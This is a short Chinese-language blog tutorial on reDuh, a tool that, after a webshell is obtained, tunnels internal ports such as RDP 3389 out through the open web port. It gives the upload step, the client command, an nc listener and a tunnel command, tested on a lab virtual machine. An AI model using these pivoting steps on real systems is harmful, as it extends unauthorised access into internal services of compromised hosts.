webshell跳板——reduh的用法介紹

reDuh

0x00 reduh

經(jīng)常我們拿到一個shell后,發(fā)現(xiàn)只將目標(biāo)服務(wù)器的80端口映射到公網(wǎng)ip地址,無法訪問其他端口,如3389或3306等

這時可以通過reduh做一個跳板,將特定端口通過開放的80端口從內(nèi)網(wǎng)中轉(zhuǎn)發(fā)出來

0x00 So Easy

首先我們需要一個webshell,這里我直接在虛擬機(jī)里面寫一個了

image.png

然后通過webshell上傳reduh的服務(wù)端,在\reDuhServers\目錄下
image.png

這里用的jsp的環(huán)境就上傳一個jsp的服務(wù)端
image.png

上傳后的地址為http://192.168.49.154:8080/reDuh.jsp

然后本地通過命令行執(zhí)行reduh的客戶端(位于\reDuhClient\dist\目錄下)

java -jar reDuhClient.jar http://192.168.49.154:8080/reDuh.jsp
image.png

然后通過nc監(jiān)聽本地1010端口

nc.exe -nvv 127.0.0.1 1010
image.png

然后創(chuàng)建隧道,以將3389端口為例

[createTunnel]6666:127.0.0.1:3389

image.png

然后本地通過mstsc連接127.0.0.1:6666
image.png

這時能看到reduh本地客戶端產(chǎn)生了流量
image.png

image.png

這樣就可以通過webshell建立其他端口的通信隧道

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容